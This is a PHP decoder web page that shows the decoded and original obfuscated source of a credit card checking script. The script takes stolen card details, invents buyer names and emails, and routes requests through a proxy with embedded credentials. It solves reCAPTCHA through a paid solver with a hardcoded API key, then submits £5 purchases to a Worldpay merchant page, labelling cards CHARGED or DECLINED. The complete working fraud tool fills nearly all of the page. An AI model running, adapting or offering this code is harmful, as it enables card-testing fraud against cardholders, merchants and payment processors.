Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

goto piuJa; hwjEQ: $result = curl_exec($ch); goto Ziy7N; Dt0ml: $card = "{$cc}\x7c{$mm}..

Decoded Output download

<?   
 goto piuJa; hwjEQ: $result = curl_exec($ch); goto Ziy7N; Dt0ml: $card = "{$cc}|{$mm}|{$yyyy}|{$cvc}"; goto FPoBo; k5WaP: $email = str_shuffle(substr($firstname, 0, 6) . "_" . substr($lastname, 0, 6)) . rand(100, 999) . $domain[array_rand($domain)]; goto wsuSm; Dj34u: $proxyuserpwd = "rmpttlhlie-cc-gb-sessid-6639209273979-sesstime-30:31cqo72j63k232y"; goto FlKa7; vrjVv: $proxy = "oxy.proxycue.com:3000"; goto Dj34u; o03Yn: $message = misaka($result, "<li>", "</li>"); goto h6TFL; EPVEM: curl_exec($ch); goto kOhnd; FlKa7: $firstname = randomStrings(8); goto iJ_CO; iJ_CO: $lastname = randomStrings(8); goto WH8Ug; EfODY: list($cc, $mm, $yyyy, $cvc) = explode("|", preg_replace("/[^0-9|]+/", '', $card)); goto xT6Zn; H66fW: function misaka($string, $string1, $string2) { return trim(explode($string2, explode($string1, $string)[1])[0]); } goto HFvOJ; R7pdY: curl_setopt_array($ch, array(CURLOPT_URL => "https://secure.worldpay.com/wcc/card?PaymentID=" . base64_encode($PaymentID) . "&Lang=en&DispatcherID=" . implode("-", array_slice(explode("-", $PaymentID), 0, 3)) . "&op-PMInitial=", CURLOPT_USERAGENT => $_SERVER["HTTP_USER_AGENT"], CURLOPT_CUSTOMREQUEST => "GET", CURLOPT_RETURNTRANSFER => 1, CURLOPT_COOKIEFILE => $cookies, CURLOPT_COOKIEJAR => $cookies, CURLOPT_PROXY => $proxy, CURLOPT_PROXYUSERPWD => $proxyuserpwd)); goto OdF3M; spNa8: strlen($yyyy) == 2 ? $yyyy = "20" . $yyyy : NULL; goto jSjcE; WH8Ug: $domain = array("@gmail.com", "@outlook.com", "@yahoo.com"); goto k5WaP; GBlAs: $mm === "10" ? $m = "10" : $mm; goto spNa8; oXbWm: retry: goto cX7kn; piuJa: ini_set("max_execution_time", "0"); goto s0Ifr; cSeAv: if (strpos($result, "Thank you, your payment was successful.")) { response("CHARGED", $card, "AUTH_MSG = 0000"); } elseif (strpos($result, "Challenge") || $result == NULL || strpos($result, "Access Denied") || strpos($result, "No payment information is available")) { if ($count < 5) { $count++; goto retry; } } elseif ($message == TRUE) { response("DECLINED", $card, "MSG = FAILURE ({$count})"); } else { response("DECLINED", $card, "MSG = DO NOT RETRY (MAX RETRIES)"); } goto DELGV; HFvOJ: function response($string, $string1, $string2) { return die(implode(" | ", array($string, $string1, $string2)) . "<br>"); } goto rDT2A; OdF3M: curl_exec($ch); goto IocrF; n4XJM: $result = curl_exec($ch); goto NxX02; Ziy7N: curl_close($ch); goto mO_pf; uummO: curl_setopt_array($ch, array(CURLOPT_URL => "https://api.capsolver.com/createTask", CURLOPT_USERAGENT => $_SERVER["HTTP_USER_AGENT"], CURLOPT_CUSTOMREQUEST => "POST", CURLOPT_RETURNTRANSFER => 1, CURLOPT_HTTPHEADER => array("Host: api.capsolver.com", "Content-Type: application/json"), CURLOPT_POSTFIELDS => json_encode(array("clientKey" => "CAP-E87DB3B87FF67D06571739FD50AEE2F5", "task" => array("type" => "RecaptchaV2TaskProxyless", "websiteURL" => "https://secure.worldpay.com/", "websiteKey" => "6LfWIQcUAAAAAHK_CgpruJ8BHouCe6Xp1EH-i8Nn"))))); goto hwjEQ; MBIUV: while (TRUE) { $ch = curl_init(); curl_setopt_array($ch, array(CURLOPT_URL => "https://api.capsolver.com/getTaskResult", CURLOPT_USERAGENT => $_SERVER["HTTP_USER_AGENT"], CURLOPT_CUSTOMREQUEST => "POST", CURLOPT_RETURNTRANSFER => 1, CURLOPT_HTTPHEADER => array("Host: api.capsolver.com", "Content-Type: application/json"), CURLOPT_POSTFIELDS => json_encode(array("clientKey" => "CAP-E87DB3B87FF67D06571739FD50AEE2F5", "taskId" => $taskId)))); $result = curl_exec($ch); curl_close($ch); $status = json_decode($result)->status; $gRecaptchaResponse = json_decode($result)->solution->gRecaptchaResponse; if ($status == "processing") { continue; } break; } goto vrjVv; FPoBo: switch (TRUE) { case $cc[0] == "3" && strlen($cc) == 15: $brand = "AMEX"; break; case $cc[0] == "3": $brand = "JCB"; break; case $cc[0] == "4": $brand = "VISA"; break; case $cc[0] == "5": $brand = "ECMC"; break; } goto H66fW; bmnfK: $ch = curl_init(); goto kzNrX; wRMns: $result = curl_exec($ch); goto zTR0s; kzNrX: curl_setopt_array($ch, array(CURLOPT_URL => "https://secure.worldpay.com/wcc/card", CURLOPT_USERAGENT => $_SERVER["HTTP_USER_AGENT"], CURLOPT_CUSTOMREQUEST => "POST", CURLOPT_RETURNTRANSFER => 1, CURLOPT_COOKIEFILE => $cookies, CURLOPT_COOKIEJAR => $cookies, CURLOPT_PROXY => $proxy, CURLOPT_PROXYUSERPWD => $proxyuserpwd, CURLOPT_POSTFIELDS => http_build_query(array("PaymentID" => $PaymentID, "Lang" => "en", "cardNoInput" => $cc, "cardNoHidden" => "*hidden*", "cardExp.day" => "32", "cardExp.time" => "23:59:59", "cardExp.month" => $m, "cardExp.year" => $yyyy, "name" => implode(" ", array($firstname, $lastname)), "address" => "Unit 13 Ashford Business Centre", "postcode" => "TW15 1YQ", "country" => "GB", "email" => $email, "g-recaptcha-response" => $gRecaptchaResponse, "colourDepth" => 24, "screenHeight" => 768, "screenWidth" => 1366, "language" => "en-US", "timeZone" => "-480", "op-PMMakePayment" => "Submit Query")))); goto wRMns; wsuSm: $ch = curl_init(); goto xMCsX; IocrF: curl_close($ch); goto bmnfK; xMCsX: curl_setopt_array($ch, array(CURLOPT_URL => "https://secure.worldpay.com/wcc/purchase", CURLOPT_USERAGENT => $_SERVER["HTTP_USER_AGENT"], CURLOPT_CUSTOMREQUEST => "POST", CURLOPT_RETURNTRANSFER => 1, CURLOPT_COOKIEFILE => $cookies, CURLOPT_COOKIEJAR => $cookies, CURLOPT_PROXY => $proxy, CURLOPT_PROXYUSERPWD => $proxyuserpwd, CURLOPT_POSTFIELDS => http_build_query(array("instId" => "1198429", "cartId" => "AKPAY", "currency" => "GBP", "testmode" => 0, "desc" => "#" . rand(10000000, 99999999) . "-", "M_recipient" => "[email protected]", "M_subject" => "ORDER FROM WORLDPAY", "fake_amount" => 5, "card_type" => "debit_card", "invoice" => rand(10000000, 99999999), "name" => implode(" ", array($firstname, $lastname)), "email" => $email, "address" => "Unit 13 Ashford Business Centre", "country" => "GB", "postcode" => "TW15 1YQ", "amount" => "5.00")))); goto n4XJM; WoS6Q: $ch = curl_init(); goto J_G0d; uSx1p: $PaymentID = misaka($result, "NAME=PaymentID VALUE="", """); goto WoS6Q; cX7kn: $ch = curl_init(); goto uummO; s0Ifr: ini_set("error_reporting", E_ERROR | E_PARSE); goto FK0O8; jSjcE: $yy = substr($yyyy, 2, 2); goto Dt0ml; NxX02: curl_close($ch); goto uSx1p; GUKtK: $ch = curl_init(); goto R7pdY; FK0O8: $cookies = getcwd() . "/cookies/COOKIE_" . mt_rand(1000, 9999) . ".txt"; goto kpY0M; kpY0M: fwrite(fopen($cookies, "w"), ''); goto pu3th; h6TFL: $default = htmlentities($result); goto cSeAv; mO_pf: $taskId = json_decode($result)->taskId; goto MBIUV; rDT2A: function randomStrings($string) { $characters = implode('', range("a", "z")) . implode('', range("A", "Z")); $length = strlen($characters); $word = ''; for ($string1 = 0; $string1 <= $string; $string1++) { $word .= $characters[mt_rand(0, $length)]; } return $word; } goto kYeJt; zTR0s: curl_close($ch); goto o03Yn; kOhnd: curl_close($ch); goto GUKtK; kYeJt: $count = 0; goto oXbWm; J_G0d: curl_setopt_array($ch, array(CURLOPT_URL => "https://secure.worldpay.com/wcc/purchase", CURLOPT_USERAGENT => $_SERVER["HTTP_USER_AGENT"], CURLOPT_CUSTOMREQUEST => "POST", CURLOPT_RETURNTRANSFER => 1, CURLOPT_COOKIEFILE => $cookies, CURLOPT_COOKIEJAR => $cookies, CURLOPT_PROXY => $proxy, CURLOPT_PROXYUSERPWD => $proxyuserpwd, CURLOPT_POSTFIELDS => http_build_query(array("PaymentID" => $PaymentID, "Lang" => "en", "authCurrency" => "GBP", "op-DPChoose-VISA^SSL.x" => "27", "op-DPChoose-VISA^SSL.y" => "30")))); goto EPVEM; pu3th: extract($_GET); goto EfODY; xT6Zn: $m = ltrim($mm, "0"); goto GBlAs; DELGV:  ?>

Did this file decode correctly?

Original Code


 goto piuJa; hwjEQ: $result = curl_exec($ch); goto Ziy7N; Dt0ml: $card = "{$cc}\x7c{$mm}\x7c{$yyyy}\174{$cvc}"; goto FPoBo; k5WaP: $email = str_shuffle(substr($firstname, 0, 6) . "\x5f" . substr($lastname, 0, 6)) . rand(100, 999) . $domain[array_rand($domain)]; goto wsuSm; Dj34u: $proxyuserpwd = "\162\x6d\x70\164\164\154\x68\x6c\151\x65\55\143\x63\55\x67\x62\55\163\x65\163\163\x69\x64\x2d\66\x36\x33\x39\62\x30\x39\x32\67\63\71\67\x39\55\x73\145\163\163\x74\151\155\x65\x2d\63\x30\72\63\61\143\161\x6f\67\62\x6a\66\x33\153\x32\x33\62\171"; goto FlKa7; vrjVv: $proxy = "\x6f\170\171\x2e\160\x72\157\170\171\143\165\145\56\x63\x6f\155\72\x33\x30\60\60"; goto Dj34u; o03Yn: $message = misaka($result, "\74\x6c\151\76", "\x3c\57\154\x69\x3e"); goto h6TFL; EPVEM: curl_exec($ch); goto kOhnd; FlKa7: $firstname = randomStrings(8); goto iJ_CO; iJ_CO: $lastname = randomStrings(8); goto WH8Ug; EfODY: list($cc, $mm, $yyyy, $cvc) = explode("\174", preg_replace("\57\133\136\x30\x2d\71\174\x5d\x2b\x2f", '', $card)); goto xT6Zn; H66fW: function misaka($string, $string1, $string2) { return trim(explode($string2, explode($string1, $string)[1])[0]); } goto HFvOJ; R7pdY: curl_setopt_array($ch, array(CURLOPT_URL => "\150\x74\164\x70\x73\72\x2f\57\163\145\x63\x75\x72\x65\56\x77\157\x72\x6c\x64\x70\x61\x79\x2e\143\157\155\57\x77\x63\x63\x2f\x63\x61\162\144\77\120\141\x79\155\x65\x6e\164\x49\x44\75" . base64_encode($PaymentID) . "\46\114\x61\156\x67\75\x65\x6e\46\104\151\163\x70\x61\x74\x63\150\x65\x72\x49\x44\x3d" . implode("\55", array_slice(explode("\55", $PaymentID), 0, 3)) . "\46\157\x70\x2d\x50\x4d\x49\x6e\x69\x74\151\141\x6c\x3d", CURLOPT_USERAGENT => $_SERVER["\x48\x54\124\x50\x5f\125\123\105\122\137\101\x47\x45\116\x54"], CURLOPT_CUSTOMREQUEST => "\107\105\124", CURLOPT_RETURNTRANSFER => 1, CURLOPT_COOKIEFILE => $cookies, CURLOPT_COOKIEJAR => $cookies, CURLOPT_PROXY => $proxy, CURLOPT_PROXYUSERPWD => $proxyuserpwd)); goto OdF3M; spNa8: strlen($yyyy) == 2 ? $yyyy = "\62\60" . $yyyy : NULL; goto jSjcE; WH8Ug: $domain = array("\x40\147\x6d\141\x69\154\x2e\143\x6f\155", "\100\157\x75\x74\x6c\x6f\x6f\153\x2e\x63\157\x6d", "\x40\171\x61\150\157\x6f\x2e\143\157\155"); goto k5WaP; GBlAs: $mm === "\x31\x30" ? $m = "\x31\60" : $mm; goto spNa8; oXbWm: retry: goto cX7kn; piuJa: ini_set("\x6d\141\170\x5f\x65\x78\145\x63\165\x74\151\x6f\156\x5f\164\x69\x6d\x65", "\60"); goto s0Ifr; cSeAv: if (strpos($result, "\124\x68\x61\x6e\153\40\171\157\x75\54\40\171\157\165\162\40\x70\x61\x79\x6d\x65\x6e\164\x20\x77\x61\x73\40\163\165\143\143\x65\163\163\x66\165\x6c\56")) { response("\103\110\x41\122\x47\x45\104", $card, "\x41\x55\124\x48\x5f\x4d\123\107\x20\x3d\40\60\60\60\x30"); } elseif (strpos($result, "\x43\150\141\154\154\x65\156\147\x65") || $result == NULL || strpos($result, "\x41\x63\143\x65\163\163\x20\104\145\156\151\145\x64") || strpos($result, "\x4e\157\40\160\141\x79\155\x65\x6e\x74\x20\x69\x6e\146\x6f\162\155\141\164\x69\157\156\x20\x69\163\40\141\166\x61\x69\x6c\141\x62\154\145")) { if ($count < 5) { $count++; goto retry; } } elseif ($message == TRUE) { response("\x44\x45\x43\114\x49\x4e\x45\x44", $card, "\115\x53\x47\40\75\x20\x46\101\x49\x4c\125\122\105\x20\x28{$count}\x29"); } else { response("\104\x45\103\x4c\x49\116\105\x44", $card, "\115\123\x47\x20\75\40\104\117\40\x4e\x4f\x54\x20\x52\105\124\122\x59\x20\x28\115\x41\x58\x20\122\105\124\122\x49\105\x53\x29"); } goto DELGV; HFvOJ: function response($string, $string1, $string2) { return die(implode("\40\x7c\40", array($string, $string1, $string2)) . "\74\x62\162\76"); } goto rDT2A; OdF3M: curl_exec($ch); goto IocrF; n4XJM: $result = curl_exec($ch); goto NxX02; Ziy7N: curl_close($ch); goto mO_pf; uummO: curl_setopt_array($ch, array(CURLOPT_URL => "\x68\164\164\160\x73\72\57\57\x61\x70\151\56\x63\x61\160\163\x6f\x6c\x76\x65\162\56\143\157\x6d\57\x63\x72\x65\x61\164\145\124\141\163\153", CURLOPT_USERAGENT => $_SERVER["\x48\124\124\x50\137\125\123\105\x52\x5f\x41\107\105\116\124"], CURLOPT_CUSTOMREQUEST => "\x50\117\x53\x54", CURLOPT_RETURNTRANSFER => 1, CURLOPT_HTTPHEADER => array("\x48\157\x73\x74\x3a\40\141\x70\151\x2e\143\141\160\163\157\154\x76\x65\162\56\143\157\x6d", "\103\157\x6e\164\x65\x6e\x74\55\x54\x79\x70\145\72\40\x61\x70\160\154\x69\143\x61\164\x69\157\156\57\x6a\x73\157\x6e"), CURLOPT_POSTFIELDS => json_encode(array("\143\x6c\151\145\156\164\x4b\145\x79" => "\x43\101\x50\x2d\x45\x38\x37\x44\102\x33\x42\70\67\106\106\x36\x37\x44\x30\x36\65\67\61\67\x33\x39\106\104\65\x30\101\105\x45\62\106\x35", "\x74\x61\x73\153" => array("\164\x79\160\x65" => "\x52\145\x63\x61\x70\x74\x63\x68\x61\x56\x32\x54\x61\x73\153\x50\x72\x6f\170\x79\x6c\145\x73\163", "\x77\x65\x62\x73\x69\164\145\x55\x52\114" => "\x68\164\164\x70\x73\72\57\x2f\163\x65\143\165\x72\145\x2e\x77\x6f\x72\x6c\144\160\x61\x79\56\x63\x6f\x6d\x2f", "\x77\145\x62\163\x69\x74\x65\113\x65\x79" => "\x36\114\146\x57\x49\x51\x63\x55\101\x41\x41\101\101\110\x4b\x5f\x43\x67\x70\x72\165\112\x38\x42\x48\157\x75\103\145\x36\130\x70\x31\105\110\55\151\70\x4e\156"))))); goto hwjEQ; MBIUV: while (TRUE) { $ch = curl_init(); curl_setopt_array($ch, array(CURLOPT_URL => "\x68\x74\x74\x70\x73\72\57\57\141\160\151\56\x63\141\160\x73\157\154\166\145\x72\56\x63\x6f\x6d\x2f\x67\x65\164\x54\141\163\153\122\x65\x73\x75\154\x74", CURLOPT_USERAGENT => $_SERVER["\110\124\124\120\x5f\125\x53\105\x52\x5f\x41\107\x45\x4e\124"], CURLOPT_CUSTOMREQUEST => "\120\117\123\x54", CURLOPT_RETURNTRANSFER => 1, CURLOPT_HTTPHEADER => array("\x48\x6f\163\164\72\40\x61\x70\x69\56\143\x61\x70\x73\157\154\x76\145\x72\56\x63\x6f\x6d", "\x43\x6f\x6e\164\145\x6e\x74\55\124\171\160\145\x3a\40\x61\x70\x70\x6c\x69\x63\141\164\151\157\156\x2f\152\x73\x6f\156"), CURLOPT_POSTFIELDS => json_encode(array("\143\x6c\151\x65\156\164\113\x65\x79" => "\x43\x41\120\55\105\70\x37\104\x42\63\x42\x38\x37\x46\106\66\x37\104\60\66\65\67\x31\x37\x33\x39\x46\104\x35\60\101\x45\x45\x32\x46\x35", "\x74\x61\163\153\111\x64" => $taskId)))); $result = curl_exec($ch); curl_close($ch); $status = json_decode($result)->status; $gRecaptchaResponse = json_decode($result)->solution->gRecaptchaResponse; if ($status == "\x70\162\157\143\145\x73\x73\151\156\147") { continue; } break; } goto vrjVv; FPoBo: switch (TRUE) { case $cc[0] == "\63" && strlen($cc) == 15: $brand = "\x41\x4d\105\130"; break; case $cc[0] == "\x33": $brand = "\112\x43\x42"; break; case $cc[0] == "\64": $brand = "\x56\111\123\101"; break; case $cc[0] == "\65": $brand = "\x45\103\115\103"; break; } goto H66fW; bmnfK: $ch = curl_init(); goto kzNrX; wRMns: $result = curl_exec($ch); goto zTR0s; kzNrX: curl_setopt_array($ch, array(CURLOPT_URL => "\x68\x74\x74\160\x73\72\57\x2f\x73\145\x63\165\x72\145\56\x77\x6f\162\x6c\x64\x70\141\171\x2e\x63\x6f\x6d\57\167\143\143\57\143\x61\x72\x64", CURLOPT_USERAGENT => $_SERVER["\x48\124\124\120\137\x55\x53\105\x52\137\101\107\x45\x4e\124"], CURLOPT_CUSTOMREQUEST => "\x50\117\x53\x54", CURLOPT_RETURNTRANSFER => 1, CURLOPT_COOKIEFILE => $cookies, CURLOPT_COOKIEJAR => $cookies, CURLOPT_PROXY => $proxy, CURLOPT_PROXYUSERPWD => $proxyuserpwd, CURLOPT_POSTFIELDS => http_build_query(array("\x50\141\x79\155\x65\x6e\x74\x49\x44" => $PaymentID, "\x4c\x61\156\147" => "\145\x6e", "\x63\x61\162\144\116\157\111\x6e\x70\165\164" => $cc, "\x63\x61\162\144\116\157\110\151\x64\x64\145\x6e" => "\x2a\x68\x69\x64\x64\x65\x6e\52", "\143\141\x72\144\105\170\160\x2e\x64\x61\171" => "\63\62", "\x63\141\x72\144\x45\x78\160\x2e\164\x69\155\145" => "\x32\x33\x3a\65\x39\72\65\71", "\x63\141\162\x64\105\x78\x70\x2e\x6d\x6f\x6e\x74\150" => $m, "\x63\x61\x72\x64\x45\x78\x70\x2e\x79\145\x61\x72" => $yyyy, "\x6e\x61\x6d\x65" => implode("\40", array($firstname, $lastname)), "\x61\x64\144\162\145\x73\163" => "\125\x6e\x69\164\40\61\x33\x20\x41\163\x68\146\157\x72\x64\40\102\x75\x73\151\x6e\145\x73\x73\x20\103\x65\x6e\x74\162\x65", "\x70\x6f\163\x74\x63\x6f\x64\145" => "\x54\x57\x31\65\40\x31\131\x51", "\143\x6f\165\156\164\162\171" => "\107\x42", "\x65\x6d\x61\151\154" => $email, "\x67\55\162\145\x63\x61\160\x74\143\x68\x61\55\x72\145\163\160\157\x6e\x73\145" => $gRecaptchaResponse, "\x63\157\154\157\x75\x72\104\145\160\164\150" => 24, "\x73\143\162\145\145\x6e\x48\x65\x69\147\x68\164" => 768, "\x73\143\162\145\x65\x6e\x57\x69\144\164\x68" => 1366, "\x6c\x61\156\147\165\x61\x67\145" => "\145\x6e\x2d\x55\x53", "\164\151\x6d\x65\x5a\x6f\x6e\x65" => "\55\64\70\60", "\157\x70\55\120\115\x4d\141\153\145\x50\141\x79\x6d\145\x6e\164" => "\x53\x75\x62\155\x69\x74\x20\x51\165\145\x72\x79")))); goto wRMns; wsuSm: $ch = curl_init(); goto xMCsX; IocrF: curl_close($ch); goto bmnfK; xMCsX: curl_setopt_array($ch, array(CURLOPT_URL => "\x68\164\x74\x70\x73\72\57\57\x73\x65\143\165\x72\145\x2e\167\157\162\x6c\x64\x70\x61\x79\56\143\x6f\x6d\x2f\x77\x63\x63\57\160\x75\162\143\150\141\163\145", CURLOPT_USERAGENT => $_SERVER["\x48\124\124\x50\137\125\123\105\x52\x5f\101\x47\105\x4e\124"], CURLOPT_CUSTOMREQUEST => "\120\117\123\x54", CURLOPT_RETURNTRANSFER => 1, CURLOPT_COOKIEFILE => $cookies, CURLOPT_COOKIEJAR => $cookies, CURLOPT_PROXY => $proxy, CURLOPT_PROXYUSERPWD => $proxyuserpwd, CURLOPT_POSTFIELDS => http_build_query(array("\x69\x6e\x73\164\111\x64" => "\x31\x31\x39\70\64\62\x39", "\x63\141\162\164\x49\144" => "\x41\x4b\x50\101\131", "\x63\165\162\x72\x65\156\x63\171" => "\107\102\120", "\x74\x65\x73\164\x6d\157\x64\x65" => 0, "\x64\145\x73\x63" => "\43" . rand(10000000, 99999999) . "\55", "\115\x5f\x72\x65\x63\x69\x70\151\145\x6e\x74" => "\155\x61\151\154\100\x61\x75\x73\164\x69\156\x6b\145\x6d\x70\x2e\x63\157\x2e\x75\153", "\x4d\137\163\165\x62\x6a\145\x63\x74" => "\117\x52\x44\x45\122\40\106\122\117\x4d\x20\127\117\x52\114\104\120\101\x59", "\x66\x61\x6b\x65\137\x61\155\157\x75\156\x74" => 5, "\143\x61\162\x64\x5f\x74\171\160\145" => "\x64\x65\x62\x69\x74\137\143\x61\162\x64", "\151\x6e\166\157\x69\x63\145" => rand(10000000, 99999999), "\156\141\155\x65" => implode("\x20", array($firstname, $lastname)), "\145\155\x61\x69\154" => $email, "\141\144\x64\x72\x65\163\x73" => "\x55\156\151\164\40\x31\63\40\101\163\x68\x66\157\162\x64\x20\x42\165\163\151\x6e\x65\163\163\40\x43\x65\x6e\x74\162\x65", "\143\x6f\165\x6e\164\x72\171" => "\107\102", "\160\157\163\164\x63\x6f\144\145" => "\x54\127\x31\x35\x20\x31\131\x51", "\141\x6d\x6f\165\x6e\164" => "\x35\56\60\60")))); goto n4XJM; WoS6Q: $ch = curl_init(); goto J_G0d; uSx1p: $PaymentID = misaka($result, "\x4e\x41\x4d\x45\x3d\x50\x61\x79\x6d\145\x6e\164\111\x44\40\x56\x41\114\125\x45\75\42", "\42"); goto WoS6Q; cX7kn: $ch = curl_init(); goto uummO; s0Ifr: ini_set("\x65\x72\162\x6f\162\x5f\162\145\x70\157\x72\164\x69\156\147", E_ERROR | E_PARSE); goto FK0O8; jSjcE: $yy = substr($yyyy, 2, 2); goto Dt0ml; NxX02: curl_close($ch); goto uSx1p; GUKtK: $ch = curl_init(); goto R7pdY; FK0O8: $cookies = getcwd() . "\57\x63\x6f\157\153\151\x65\163\57\103\x4f\x4f\x4b\x49\x45\x5f" . mt_rand(1000, 9999) . "\56\x74\x78\x74"; goto kpY0M; kpY0M: fwrite(fopen($cookies, "\167"), ''); goto pu3th; h6TFL: $default = htmlentities($result); goto cSeAv; mO_pf: $taskId = json_decode($result)->taskId; goto MBIUV; rDT2A: function randomStrings($string) { $characters = implode('', range("\x61", "\x7a")) . implode('', range("\x41", "\x5a")); $length = strlen($characters); $word = ''; for ($string1 = 0; $string1 <= $string; $string1++) { $word .= $characters[mt_rand(0, $length)]; } return $word; } goto kYeJt; zTR0s: curl_close($ch); goto o03Yn; kOhnd: curl_close($ch); goto GUKtK; kYeJt: $count = 0; goto oXbWm; J_G0d: curl_setopt_array($ch, array(CURLOPT_URL => "\x68\x74\x74\x70\x73\x3a\57\x2f\x73\145\143\165\x72\145\56\167\157\162\x6c\144\160\x61\171\x2e\x63\x6f\155\x2f\x77\143\143\x2f\160\165\x72\x63\x68\x61\x73\x65", CURLOPT_USERAGENT => $_SERVER["\x48\x54\124\120\137\125\123\x45\x52\x5f\x41\107\x45\x4e\x54"], CURLOPT_CUSTOMREQUEST => "\x50\117\x53\x54", CURLOPT_RETURNTRANSFER => 1, CURLOPT_COOKIEFILE => $cookies, CURLOPT_COOKIEJAR => $cookies, CURLOPT_PROXY => $proxy, CURLOPT_PROXYUSERPWD => $proxyuserpwd, CURLOPT_POSTFIELDS => http_build_query(array("\120\141\x79\155\x65\x6e\164\111\x44" => $PaymentID, "\114\x61\x6e\147" => "\x65\156", "\141\x75\164\x68\103\165\162\162\x65\156\143\x79" => "\x47\102\x50", "\157\x70\55\x44\x50\x43\150\157\x6f\x73\145\55\126\x49\123\x41\x5e\123\123\114\x2e\170" => "\x32\x37", "\157\160\55\x44\x50\x43\150\157\157\x73\145\x2d\126\111\123\x41\136\x53\123\114\56\171" => "\63\x30")))); goto EPVEM; pu3th: extract($_GET); goto EfODY; xT6Zn: $m = ltrim($mm, "\x30"); goto GBlAs; DELGV:

Function Calls

None

Variables

None

Stats

MD5 08d853e9b56693cd48d1b6c2a6c02b1b
Eval Count 0
Decode Time 56 ms